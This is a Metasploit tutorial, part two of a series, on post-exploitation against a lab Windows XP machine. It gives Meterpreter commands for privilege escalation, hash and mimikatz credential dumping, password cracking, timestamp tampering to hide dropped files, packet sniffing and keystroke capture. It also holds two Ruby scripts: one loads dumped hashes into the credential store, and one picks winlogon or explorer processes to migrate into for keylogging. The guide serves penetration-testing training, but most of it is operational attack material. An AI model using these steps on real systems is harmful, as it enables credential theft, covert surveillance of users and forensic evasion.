MSF Fundamentals 2017 (Part 2 of 3) – Exploitation and Post-Exploitation

This is the quick-hit version of part two of a three-part series on Metasploit Fundamentals that I wrote to update my previous work (from 2014) on Metasploit. If you’re looking for a more hands-on, in-depth version of this article you can access training on this topic here.

The purpose of this article is to cover exploitation and post-exploitation modules to the point where you are comfortable with the various ways of manipulating a system after you’ve opened a session to it. Part one covered starting up the MSF, finding an exploit, finding a matching payload, and configuring everything up to the point of launching the exploit. Part three covers pivoting, port forwarding, and automation. This training assumes you’re using a 2016 variant of Kali Linux and that it’s patched up to at least August 2016. If that’s true, then let’s go!

Notes

  1. This article assumes that you are already familiar with the contents of part one.  If you aren’t, go back and read that now.
  2. For the purposes of this article we will assume that the vulnerable system is on 10.20.30.100 and that the machine running MSF is on 10.20.30.200.  We’ll furthermore assume that the target is a Windows XP machine that you have already exploited using MS08-067, as detailed in part one, and that you have a running Meterpreter session.
  3. As these are quick-hit notes I haven’t included screenshots or output. They’re intended for you to follow along with and modify as appropriate for your environment.  If you want to quickly establish a test environment that will support all of these tests, install a Windows XP SP1 VM with two accounts, log into one of the accounts, log back out, and leave the machine running.
  4. I’m using the prefix “MSF> ” for things typed at the msfconsole prompt and “MTR> ” for things typed inside a Meterpreter session.

Managing Sessions

MSF> sessions -l                                    # List all sessions from msfconsole (plain "sessions" does the same)
MSF> sessions -i {session_number}                   # Interact with session {session_number}
MSF> sessions -C {command} -i {session_number}      # Run Meterpreter {command} on session {session_number}
MSF> sessions -C {command}                          # Run Meterpreter {command} on every open session
MTR> background                                     # Return to msfconsole, leaving the session open
MTR> sessions {session_number}                      # Switch directly to session {session_number} without backgrounding first

Migrating Host Processes

MTR> ps                                             # Show all processes; note the PID, owner and arch of a candidate host
MTR> migrate {PID}                                   # Migrate Meterpreter into {PID} as its host process

You can only migrate into a process your current token is allowed to open, so escalate first (see Privilege Escalation below) if you want to land in a SYSTEM-owned process such as winlogon.exe, and prefer a long-lived process whose architecture matches your payload: if the host process exits, the session dies with it. Migrating also ends any keystroke capture that was running in the old host process, so migrate first and start capturing afterwards.

Using Meterpreter Extensions

MTR> help                                            # Show help; commands are grouped by extension ("Stdapi:", "Priv:", ...)
MTR> help {command}                                  # Does NOT work in Meterpreter (it does in msfconsole); use {command} -h instead
MTR> {command} -h                                    # Get help for {command}
MTR> load [tab twice]                                # Show available extensions to load
MTR> load {extension}                                # Load {extension}; its DLL is pushed from the MSF host into the session

Privilege Escalation

MTR> getsystem                                       # Try the built-in techniques in turn to become SYSTEM

getsystem tries several named-pipe impersonation and token-duplication techniques in turn, most of which require that the session already runs as a local administrator; run getuid before and after to confirm what you actually have. If the generic getsystem approach doesn’t work, background the session, choose an appropriate local exploit (e.g. exploit/windows/local/ms10_092_schelevator), set “SESSION” to the session ID you want to escalate, and run it. A successful local exploit opens a new, higher-privileged session alongside the original one.

Credential Dumping

MTR> hashdump                                        # Dump the local SAM hashes (user:RID:LM:NT:::)
MTR> load mimikatz                                   # Load the mimikatz extension
MTR> kerberos                                        # Dump Kerberos creds with mimikatz
MTR> livessp                                         # Dump LiveSSP creds with mimikatz
MSF> creds add password:'{password}'                 # Add {password} to known creds
MSF> creds add user:{user} password:'{password}'     # Add {user} with {password} to known creds
MSF> creds add user:{user} ntlm:{hash} realm:{dom}   # Add {user} with {hash} (LM:NT, as hashdump prints it) in {dom} to known creds
MSF> creds add user:{user} ssh-key:{keyfile}         # Add {user} with the SSH private key in {keyfile} to known creds

Both hashdump and the mimikatz commands need a SYSTEM-level session, so run getsystem first if you aren’t there already. The mimikatz extension has since been superseded by the kiwi extension (load kiwi, then creds_all), which is used in exactly the same way.

Just as with privilege escalation, you can run a post-exploitation module from msfconsole (e.g. post/windows/gather/hashdump) by setting “SESSION” to the session ID you want to use; from inside Meterpreter the same module can be run with run post/windows/gather/hashdump. Credentials captured by a module are added to the creds store automatically, which is the advantage of the module over the Meterpreter command; the creds add lines above are for hashes you obtained any other way.
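The hashdump-to-creds-add step above, as an added example in Ruby (Metasploit’s own language) that is not from the original article or from Metasploit: it parses hashdump’s pwdump-style records into creds add lines ready to paste into msfconsole, and flags accounts whose NT hash is the empty-password hash (nothing to crack) or whose LM hash is the empty marker (LM disabled, so only the NT half is worth cracking). The sample records are constructed; the Administrator hashes are the public LM/NT values for the password “password”, and the realm XPVICTIM is an assumed hostname.

```ruby
# Added example (Ruby, not code from the original article or from Metasploit):
# convert Meterpreter `hashdump` output into `creds add` commands for the
# msfconsole creds store, flagging the two well-known "empty" hash values.
#
# hashdump prints pwdump-style records, one per local account:
#   username:RID:LM_hash:NT_hash:::
# `creds add user:U ntlm:LM:NT` wants the LM and NT halves joined by a colon,
# which is the order hashdump already prints them in.

EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze # LM of an empty LM password (LM disabled or password > 14 chars)
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze # NT hash of an empty password

HashRecord = Struct.new(:user, :rid, :lm, :nt) do
  def blank_password?
    nt.downcase == EMPTY_NT
  end

  def lm_disabled?
    lm.downcase == EMPTY_LM
  end

  # realm is the machine name for local accounts or the domain for domain accounts.
  def to_creds_add(realm = nil)
    parts = ["creds add user:#{user}", "ntlm:#{lm}:#{nt}"]
    parts << "realm:#{realm}" if realm
    parts.join(' ')
  end
end

# Parse raw hashdump text. Console noise and blank lines are skipped, not fatal.
def parse_hashdump(text)
  records = text.each_line.map do |line|
    f = line.strip.split(':')
    next unless f.size >= 4 && f[1] =~ /\A\d+\z/
    next unless f[2] =~ /\A\h{32}\z/ && f[3] =~ /\A\h{32}\z/
    HashRecord.new(f[0], f[1].to_i, f[2], f[3])
  end
  records.compact
end

# Full pass: commands to paste into msfconsole, plus two lists worth a look
# before cracking (blank passwords need no cracking; LM-disabled ones need NT cracking).
def creds_add_commands(text, realm: nil)
  recs = parse_hashdump(text)
  {
    commands: recs.map { |r| r.to_creds_add(realm) },
    blank_password: recs.select(&:blank_password?).map(&:user),
    lm_disabled: recs.select(&:lm_disabled?).map(&:user)
  }
end

# Constructed sample. The Administrator hashes are the public LM/NT values for
# the password "password"; the analyst NT hash and the hostname XPVICTIM are made up.
SAMPLE_HASHDUMP = <<~DUMP
  [*] Dumping password hashes...
  Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  analyst:1003:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8a0ea9a7f2a3b1e1d0c9f:::
DUMP

if __FILE__ == $PROGRAM_NAME
  result = creds_add_commands(SAMPLE_HASHDUMP, realm: 'XPVICTIM')
  puts result[:commands]
  puts "blank password: #{result[:blank_password].join(', ')}"
  puts "LM disabled:    #{result[:lm_disabled].join(', ')}"
end
```

Paste the printed commands into msfconsole and the hashes land in the same creds store that jtr_crack_fast reads from; the Guest entry is reported rather than dropped so you still know the account exists with no password.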

Cracking Passwords

MSF> use auxiliary/analyze/jtr_crack_fast            # Run John the Ripper (wordlist plus fast rules) against the hashes in the creds store

The module cracks what is already in the database, so hashes gathered with Meterpreter’s hashdump must be added with creds add first; passwords it recovers are written back to the creds store.

Uploading

MTR> upload {local_file} {remote_directory}          # Upload {local_file} to {remote_directory}
MTR> upload -r {local_directory} {remote_directory}  # Recursively upload {local_directory} to {remote_directory}

As with cp on a *nix system, {local_file} can be one file or fifty; the last argument is always the remote directory. Directories and files can be mixed in a recursive upload, and a recursive upload of a single file just uploads that file.

Downloading

MTR> download {remote_file} {local_directory}        # Download {remote_file} to {local_directory}
MTR> download -t {remote_file} {local_directory}     # Download {remote_file} to {local_directory}, timestamping the local copy
MTR> download -r {remote_directory} {local_directory} # Recursively download {remote_directory} to {local_directory}

As with cp on a *nix system, {remote_file} can be one file or fifty; the last argument is always the local directory. Directories and files can be mixed in a recursive download, and a recursive download of a single file just downloads that file. The timestamping option (-t) can be combined with the recursive option (-r).

Searching

MTR> search -f {pattern}                             # Recursively search every drive for {pattern}
MTR> search -d {directory} -f {pattern}              # Recursively search from {directory} for {pattern}
MTR> search -d C:\\WINDOWS -f *.dll                  # Find all DLLs in the Windows directory and its subdirectories

Backslashes in Meterpreter paths have to be doubled (and spaces escaped with a backslash), and a search with no -d walks every drive on the target, which can take a long time on a large disk.

Hiding Data

MTR> timestomp C:\\ -b -r                            # Blank the MACE timestamps of everything under C:\, recursively
MTR> timestomp evil.exe -f C:\\WINDOWS\\notepad.exe  # Copy notepad.exe's MACE timestamps onto evil.exe
MTR> timestomp upld.dll -c "10/14/2010 11:12:13"     # Set the creation time of upld.dll to 10/14/2010 11:12:13 (MM/DD/YYYY HH24:MI:SS)

MACE stands for Modified, Accessed, Created and Entry-modified. timestomp only rewrites the $STANDARD_INFORMATION timestamps that Explorer and dir display; the $FILE_NAME copy in the MFT keeps the real values, and blanked (all-zero) timestamps are themselves a strong indicator to an examiner, so -b across a whole drive is the loudest option here rather than the quietest. The -f form, which borrows plausible values from a genuine system file, is the one you want for a single dropped file.

Packet Captures

MTR> load sniffer                                    # Load the sniffer extension (prerequisite for packet capture; Windows targets only)
MTR> sniffer_interfaces                              # List interfaces; note the interface number
MTR> sniffer_start {interface} {number_packets}      # Start capturing on {interface}, buffering up to {number_packets}
MTR> sniffer_stop {interface}                        # Stop capturing on {interface}
MTR> sniffer_dump {interface} {file}                 # Pull the buffered packets from {interface} into local pcap {file}

The capture buffer lives in the target process’s memory and nothing is written to the target’s disk; the buffer is capped at {number_packets}, so dump before it fills on a busy interface.

Keystroke Captures

MTR> keyscan_start                                   # Begin capturing keystrokes in the current host process
MTR> keyscan_dump                                    # Print the keystrokes captured so far
MTR> keyscan_stop                                    # Stop keystroke capture

Remember that this capture is specific to the process you are running in, not a system-wide keylogger. If you aren’t in the process you want to watch, migrate there first: winlogon.exe (which needs SYSTEM) sees what users type at the logon and unlock prompts, while a user’s explorer.exe sees what that user types at their desktop.
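The process selection behind migrate and the keystroke-capture note above, as an added example in Ruby (Metasploit’s own language) that is not from the original article or from Metasploit: it parses the fixed-width table that Meterpreter’s ps prints, taking the column offsets from the header line so that users and paths containing spaces survive, and picks the PID to migrate into (winlogon.exe for logon credentials, a given user’s explorer.exe for that user’s desktop). The process table is constructed for this example; XPVICTIM, the account names and the PIDs are made up, and the x86 architecture of the running Meterpreter is an assumption matching the XP target of the article.

```ruby
# Added example (Ruby, not code from the original article or from Metasploit):
# parse Meterpreter `ps` output and choose a `migrate` target for keystroke capture.
#
# `ps` prints a fixed-width table. Column start offsets are read from the header
# line, so names, users and paths that contain spaces are sliced correctly.

PS_COLUMNS = %w[PID PPID Name Arch Session User Path].freeze

ProcEntry = Struct.new(:pid, :ppid, :name, :arch, :session, :user, :path)

def parse_ps(text)
  lines = text.lines.map(&:chomp)
  hdr_i = lines.index { |l| l =~ /\A\s*PID\s+PPID\s+Name\b/ }
  return [] unless hdr_i
  header = lines[hdr_i]
  starts = PS_COLUMNS.map { |c| header.index(c) }
  return [] if starts.any?(&:nil?)          # unexpected table layout: refuse rather than misparse
  procs = []
  # hdr_i + 1 is the "---  ----" underline; the table ends at the first blank line.
  lines[(hdr_i + 2)..-1].each do |row|
    break if row.strip.empty?
    fields = starts.each_with_index.map do |s, i|
      e = starts[i + 1]
      (e ? row[s...e] : row[s..-1]).to_s.strip   # slice is nil when the row is shorter than the column
    end
    procs << ProcEntry.new(fields[0].to_i, fields[1].to_i, *fields[2..-1])
  end
  procs
end

# Choose the PID to migrate into. Only processes whose architecture matches the
# running Meterpreter qualify (assumed x86 here, as on the article's XP target);
# with several matches the lowest PID wins, normally the longest-lived instance.
def migrate_target(procs, name:, user: nil, arch: 'x86')
  found = procs.select { |p| p.name.downcase == name.downcase && p.arch == arch }
  found = found.select { |p| p.user == user } if user
  best = found.min_by(&:pid)
  best && best.pid
end

# Meterpreter commands for the two capture goals in the article: logon credentials
# are typed into winlogon.exe (SYSTEM, so getsystem first); a user's own typing goes
# to that user's explorer.exe. Returns nil when no suitable process exists.
def keyscan_commands(procs, goal, user: nil, arch: 'x86')
  pid = case goal
        when :logon   then migrate_target(procs, name: 'winlogon.exe', arch: arch)
        when :desktop then migrate_target(procs, name: 'explorer.exe', user: user, arch: arch)
        end
  pid && ["migrate #{pid}", 'keyscan_start']
end

# Constructed sample `ps` output; XPVICTIM, the users and the PIDs are made up.
SAMPLE_PS = <<~'PS'
  Process List
  ============

   PID   PPID  Name               Arch  Session  User                   Path
   ---   ----  ----               ----  -------  ----                   ----
   0     0     [System Process]
   4     0     System             x86   0        NT AUTHORITY\SYSTEM
   620   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM    \SystemRoot\System32\smss.exe
   676   620   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM    \??\C:\WINDOWS\system32\winlogon.exe
   1612  1576  explorer.exe       x86   0        XPVICTIM\analyst       C:\WINDOWS\Explorer.EXE
   1800  1612  notepad.exe        x86   0        XPVICTIM\analyst       C:\WINDOWS\system32\notepad.exe
   2200  2180  explorer.exe       x86   0        XPVICTIM\admin         C:\WINDOWS\Explorer.EXE
PS

if __FILE__ == $PROGRAM_NAME
  procs = parse_ps(SAMPLE_PS)
  puts keyscan_commands(procs, :logon).inspect
  puts keyscan_commands(procs, :desktop, user: 'XPVICTIM\analyst').inspect
end
```

Feed the two returned commands to the session in order (for example with sessions -C from msfconsole); keyscan_start has to come after the migrate because the capture belongs to the process it was started in.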

That’s all for part two… good hunting!